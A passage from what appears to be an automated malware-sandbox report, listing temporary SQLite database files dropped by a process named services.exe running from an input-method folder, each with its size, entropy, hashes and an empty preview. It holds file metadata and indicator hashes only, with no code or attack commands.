                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\8vYLYP5H6J

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\8waWroa3bJ

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\9pJalsOZnX

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\9prXLNTQH9

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\9xaU9ZZCFJ

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\A3hE6XafBl

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Aad1KyMxEJ

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\AzXNAcjK8D

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\B82aFGph2n

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\BvhNWmIKEi

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Bwz3JkrEeK

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\C5HACCzIP7

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Cfne8Omcyj

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\D50DO5XkPn

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\DaB2a0dTAx

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\DtOYqZomHn

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\DzP1hJ5zX9

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\EwAjO2RPoV

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\EwK5a4C9Wh

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ExQFCtUh7Q

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\EySRZreafR

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\EzZ1gQhVP2

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\FSvFJBIYG4

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\FUkBKHm4Om

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\FZSSimNOAr

                                                              Download File
